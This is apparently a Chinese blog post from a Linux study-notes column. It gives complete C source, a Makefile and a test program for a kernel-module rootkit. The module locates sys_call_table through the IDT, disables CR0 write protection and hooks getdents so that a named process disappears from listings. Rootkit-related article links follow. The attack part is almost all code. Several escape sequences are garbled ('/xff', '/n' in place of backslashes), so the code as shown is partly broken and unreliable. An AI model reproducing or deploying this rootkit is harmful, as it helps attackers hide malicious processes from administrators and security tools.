rootkit

最新推荐文章于 2022-11-01 21:49:06 发布
最新推荐文章于 2022-11-01 21:49:06 发布
阅读量511 收藏
点赞数
分类专栏: Linux学习笔记 文章标签: struct table module buffer filter linux

hook系统调用函数

 

/*hideps.c*/

#include <linux/module.h>
#include <linux/kernel.h>
#include <asm/unistd.h>
#include <linux/types.h>
#include <linux/sched.h>
#include <linux/dirent.h>
#include <linux/string.h>
#include <linux/file.h>
#include <linux/fs.h>
#include <linux/list.h>
#include <asm/uaccess.h>
#include <linux/unistd.h>
//#include <sys/stat.h>
//#include <fcntl.h>

#define CALLOFF 100

//使用模块参数来定义需要隐藏的进程名

int orig_cr0;
char psname[10] = "looptest";
char *processname = psname;

//module_param(processname, charp, 0);

// idtr register
struct {
    unsigned short limit;// 16 bit(bit0-15)
    unsigned int base;    // 32 bit(bit16-47)
} __attribute__ ((packed)) idtr;

// idt entity(8byte)
struct {
    unsigned short off1; // offset bit0-15(bit0-15)
    unsigned short sel; //segment selector (bit16-31)
    unsigned char none,flags; //none:(bit32-39), flag:(bit40-47)
    unsigned short off2; //offset bit16-31(bit48-63)
} __attribute__ ((packed)) * idt;

struct linux_dirent{
    unsigned long     d_ino;
    unsigned long     d_off;
    unsigned short    d_reclen;
    char    d_name[1];
};

void** sys_call_table;

//clear bit19(20th bit) of cr0 and return original cr0
unsigned int clear_and_return_cr0(void)
{
    unsigned int cr0 = 0;
    unsigned int ret;

    asm volatile ("movl %%cr0, %%eax"
            : "=a"(cr0)
         );
    ret = cr0;

    /*clear the 20th bit of CR0,*/
    cr0 &= 0xfffeffff;
    asm volatile ("movl %%eax, %%cr0"
            :
            : "a"(cr0)
         );
    return ret;
}

// restore cr0 with original value
void setback_cr0(unsigned int val)
{
    asm volatile ("movl %%eax, %%cr0"
            :
            : "a"(val)
         );
}

// original system call func
asmlinkage long (*orig_getdents)(unsigned int fd,
                    struct linux_dirent __user *dirp, unsigned int count);

// get addr start with 0xff 0x14 0x85
char * findoffset(char *start)
{
    char *p;
    for (p = start; p < start + CALLOFF; p++)
        // In x86 machine code,   call *sys_call_table(,%eax,4)
        // is translated to   0xff 0x14 0x85 <addr4> <addr3> <addr2> <addr1>
        // the 4 ‘addr’ bytes form the address of 'sys_call_table[]'
        if (*(p + 0) == '/xff' && *(p + 1) == '/x14' && *(p + 2) == '/x85')
            return p;
    return NULL;
}

// convert a digital string to int
int myatoi(char *str)
{
    int res = 0;
    int mul = 1;
    char *ptr;
    for (ptr = str + strlen(str) - 1; ptr >= str; ptr--)
    {
        // not digit
        if (*ptr < '0' || *ptr > '9')
            return (-1);
        res += (*ptr - '0') * mul;
        mul *= 10;
    }
    if(res>0 && res< 9999)
        printk(KERN_INFO "pid=%d,",res);
    printk("/n");
    return (res);
}

// get task_struct by pid
struct task_struct *get_task(pid_t pid)
{
    struct task_struct *p = get_current(),*entry=NULL;
    list_for_each_entry(entry,&(p->tasks),tasks)
    {
        if(entry->pid == pid)
        {
            printk("pid found=%d/n",entry->pid);
            return entry;
        }
    }
    printk(KERN_INFO "pid=%d not found/n",pid);
    return NULL;
}

// get task's name
static inline char *get_name(struct task_struct *p, char *buf)
{
    int i;
    char *name;
    name = p->comm;
    i = sizeof(p->comm);
    do {
        unsigned char c = *name;
        name++;
        i--;
        *buf = c;
        if (!c)
            break;
        if (c == '//') {
            buf[1] = c;
            buf += 2;
            continue;
        }
        if (c == '/n')
        {
            buf[0] = '//';
            buf[1] = 'n';
            buf += 2;
            continue;
        }
        buf++;
    }
    while (i);
    *buf = '/n';
    return buf + 1;
}

// check if pid is which we want to hook
int get_process(pid_t pid)
{
    struct task_struct *task = get_task(pid);
    //    char *buffer[64] = {0};
    char buffer[64];
    if (task)
    {
        get_name(task, buffer);
    //    if(pid>0 && pid<9999)
    //    printk(KERN_INFO "task name=%s/n",*buffer);
        if(strstr(buffer,processname))
            return 1;
        else
            return 0;
    }
    else
        return 0;
}

//hook func
asmlinkage long hacked_getdents(unsigned int fd,
                    struct linux_dirent __user *dirp, unsigned int count)
{
//added by lsc for process
    long value;
    //    struct inode *dinode;
    unsigned short len = 0;
    unsigned short tlen = 0;
//    struct linux_dirent *mydir = NULL;
//end
    //在这里调用一下sys_getdents,得到返回的结果
    value = (*orig_getdents) (fd, dirp, count);
    tlen = value;
    //遍历得到的目录列表
    while(tlen > 0)
    {
        len = dirp->d_reclen;
        tlen = tlen - len;
        printk("%s/n",dirp->d_name);
                              
        if(get_process(myatoi(dirp->d_name)) )
        {
            printk("find process/n");
            //发现匹配的进程,调用memmove将这条进程覆盖掉
            memmove(dirp, (char *) dirp + dirp->d_reclen, tlen);
            value = value - len;
            printk(KERN_INFO "hide successful./n");
        }
        if(tlen)
            dirp = (struct linux_dirent *) ((char *)dirp + dirp->d_reclen);
    }
    printk(KERN_INFO "finished hacked_getdents./n");
    return value;
}


void **get_sct_addr(void)
{
    unsigned sys_call_off;
    unsigned sct = 0;
    char *p;

    // get idtr using sidt
    asm("sidt %0":"=m"(idtr));

    // get system_call idt
    idt = (void *) (idtr.base + 8 * 0x80);

    // get offset(address of system_call func)
    sys_call_off = (idt->off2 << 16) | idt->off1;

    // get call *sys_call_table(,%eax,4)
    if ((p = findoffset((char *) sys_call_off)))
        // add   0xff 0x14 0x85 3bytes
        sct = *(unsigned *) (p + 3);
    // sys_call_table
    return ((void **)sct);
}


static int filter_init(void)
{
    //得到sys_call_table的偏移地址
    sys_call_table = get_sct_addr();
    if (!sys_call_table)
    {
        printk("get_act_addr(): NULL.../n");
        return 0;
    }
    else
        printk("sct: 0x%x/n", (unsigned int)sys_call_table);
    //将sys_call_table中注册的系统调用sys_getdents替换成我们自己的函数hack_getdents
    orig_getdents = sys_call_table[__NR_getdents];

    orig_cr0 = clear_and_return_cr0();
    sys_call_table[__NR_getdents] = hacked_getdents;
    setback_cr0(orig_cr0);
    printk(KERN_INFO "hideps: module loaded./n");
    return 0;
}


static void filter_exit(void)
{
    orig_cr0 = clear_and_return_cr0();
    if (sys_call_table)
    sys_call_table[__NR_getdents] = orig_getdents;
    setback_cr0(orig_cr0);
    printk(KERN_INFO "hideps: module removed/n");
}
module_init(filter_init);
module_exit(filter_exit);
MODULE_LICENSE("GPL");

 

Makefile

obj-m   :=hideps.o
EXTRA_CFLAGS := -Dsymname=sys_call_table
KDIR   := /lib/modules/$(shell uname -r)/build
PWD   := $(shell pwd)
default:
    $(MAKE) -C $(KDIR) SUBDIRS=$(PWD) modules
clean:
    $(RM) -rf .*.cmd *.mod.c *.o *.ko .tmp*
    make -C /lib/modules/$(shell uname -r)/build SUBDIRS=$(PWD) clean

 

looptest.c

#include<stdio.h>

int main(void)
{
    while(1);
    return 0;
}

cassper
关注
专栏目录
经典rootkit
11-07
很经典的rookits技术,就是有点旧了,不过学习经验还是很好的。
Rootkit介绍
最新发布
#7的博客
04-24 1380
本文主要介绍了Rootkit相关知识。
内核级Rootkit技术入门(1)
09-27 733
【导读】本文介绍了Windows下的内核级Rootkit的最基础性的东西,以及利用驱动程序将代码导入到内核的方法。虽然我们还没有涉及到真正的Rootkit,但这些内容是我们掌握Rootkit的必经之路,就像我们要建一座6层的楼房,却不能撇开基础和低层而直接盖第六层一样!更多的内容,会在后续的文章中陆续介绍。
什么是 Rootkit
南北极之间
07-06 5296
常见的rootkit定义是一种恶意软件程序,它使网络犯罪分子能够在不被检测到的情况下访问和渗透计算机中的数据。它涵盖了旨在感染计算机,为攻击者提供远程控制并长时间保持隐藏的软件工具箱。因此,Rootkit是最难发现和删除的恶意软件之一,并且经常用于窃听用户和对计算机发起攻击。Rootkit恶意软件可以包含多个恶意工具,其中通常包括用于启动分布式拒绝服务(DDoS)攻击的机器人;可以禁用安全软件,窃取银行和信用卡详细信息以及窃取密码的软件;和击键记录器。Rootkit 通常为攻击者提供进入计算机的后门,使他们
痛苦网安学习之RootKit
w2864619870的博客
11-01 1269
老师期末不知道留什么,我这么努力做笔记,应该可以及格。可是最近开始掉头发了,我明明都不努力的,就怕掉头发,没想到还是会这样,我不能接受。
Rootkit-Ring3_rootkit_
09-29
Repo for Rootkit Ring 3 and Ring 0 test in Python and C++
Rootkits and Bootkits 2019 English edition_pdf_Bootkit_rootkit_e
09-30
"Rootkits and Bootkits 2019 English edition_pdf_Bootkit_rootkit_e" 这个标题表明我们关注的主题是关于2019年版的Rootkits和Bootkits技术的英文版专业资料。"rootkits and bootkits 2019 Enlish edition" 描述...
RootkiRegistry_rootkit_
09-30
RootkiRegistry_rootkit_】是一个典型的针对计算机系统的隐藏工具,通常被定义为“根套件”或“根键套件”。Rootkits是恶意软件的一种形式,它们设计的目的是在受害者的计算机上隐藏自己的存在,同时允许攻击者...
cnnic.rar_rootkit
09-20
标题 "cnnic.rar_rootkit" 提到的是一个与 Rootkit 相关的压缩包,其中包含的主要是驱动程序。Rootkit 是一种恶意软件技术,主要用于隐藏其他恶意软件的存在,使其难以被安全软件或系统管理员检测到。在深入讨论之前...
全面解析恶意软件 从rootkit到bootkit
10-27 1921
 作者: Noah Schiffman,  出处:TechTarget,  如今最致命类型的恶意代码就是"Rootkit" ,这种恶意可以获得"root"权限,并部署恶意程序的可执行的软件包,Rootkit是如何危害用户的呢……  【IT专家网独家】可以说,如今最复杂,最致命类型的恶意代码就是"Rootkit" 。顾名思义,这种恶意可以获得"root"权限,在unix系统中最高
Rootkit隐形技术入门
xuplus的专栏
04-14 1582
Rootkit隐形技术入门这篇文章的作者: 宇文 出处:51CTO摘要:在安全界,rootkit已越来越引起人们的关注,而rootkit技术的过人之处就在于它的隐形技术,本文旨在向读者打开一扇通向rootkit隐形技术的大门。 一、综述本文将引领读者打造一个初级的内核级Rootkit,然后为其引入两种简单的隐形技术:进程隐形技术和文件隐形技术。同时,为了让读者获得rootk
rootkit概述
小冰球
12-07 9977
这个是摘自微信公众号里面的文章; rootkit是一个复合词,由rootkit两个词组成。root是用来描述具有计算机最高权限的用户。另一方面,kit被Merrian-Webster定义为工具和实现的集合。因此,rootkit是一组能获得计算机系统root或者管理员权限对计算机进行访问的工具。但在恶意软件领域,我们将rootkit定义为一组在恶意软件中获得root访问权限、完全控...
Rootkit实战——ls篇
FL_ybz的博客
11-05 5241
rootkit科普:Rootkit是一个或者多个用于隐藏、控制一台计算机的工具包,该技术被越来越多地应用于一些恶意软件中。在基于Windows的系统中Rootkit更多地用于隐藏程序或进程,系统被注入Rootkit后就可以在不为用户察觉的情况下进行某些操作。因此,其隐蔽性极高,危害也极大。 rootkit工作原理:攻击者想要在受害者的电脑上搞破坏时,比如装后门程序,总会留下一些蛛丝马迹,而受害者
RootKit 工具wollf的使用
我还在的博客
10-07 2368
RootKit 工具wollf的使用0x00 前言0x01 拓扑结构0x02 使用过程1. 正向连接2. 反向连接 0x00 前言 这是我对RootKit 工具wolif的使用的学习记录。 0x01 拓扑结构 0x02 使用过程 1. 正向连接 1.1 相互ping通 1.2 在控制端安装wollf命令行木马,使用命令行打开木马 1.3 配置一个服务器端 1.4 设置访问口令,和该工具运...
Rootkit
马赛克的博客
04-06 2566
一:前言 Rootkit可以隐藏文件,进程,甚至程序,就如同他们没有在计算机上安装。也可以用来隐藏用户的文件,甚至可以隐藏操作系统本身,故Rootkit最大的功能就是隐藏文件,可以躲过杀毒软件的查杀。 一般使用Rootkit进行提权,记录键盘,安装后门,以及其他的恶意任务。之所以能躲过检测,是因为Rootkit运行在操作系统中的内核,可以与用户进行的交互软件,通常其功能是在系统中较高层上实现的...
RootKit检测工具
jameson_的专栏
06-01 6540
linux下安装及使用rootkit hunter(rootkit检测扫描工具) 在官方的资料当中,rootkit hunter可以作的...
Rootkit病毒
VBcom的专栏
04-27 4306
        Rootkit病毒是一类特殊的病毒,其最大的特点是“隐形”。采用Rootkit技术的病毒,虽然存在于系统中,但是通常情况下病毒文件本身是被隐藏起来的,根本无法通过资源管理器及各种普通的文件管理工具查看到。典型的Rootkit木马病毒,有著名的“Hxdef100”“C.I.A.”,国内的“AFXRootkit”“黑客之门”等。Rootkit木马可以在目标主机上将自身程序进行隐藏,同时
FreeBSD内核Rootkit编程指南
"BSD ROOTKIT.pdf - 一本关于在FreeBSD操作系统下进行内核模式rootkit编程和开发的初稿指南,由Joseph Kong撰写,sniper翻译,qvel整理。内容涉及内核黑客技术,旨在教育读者理解并掌握rootkit的创建与设计。" 在...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值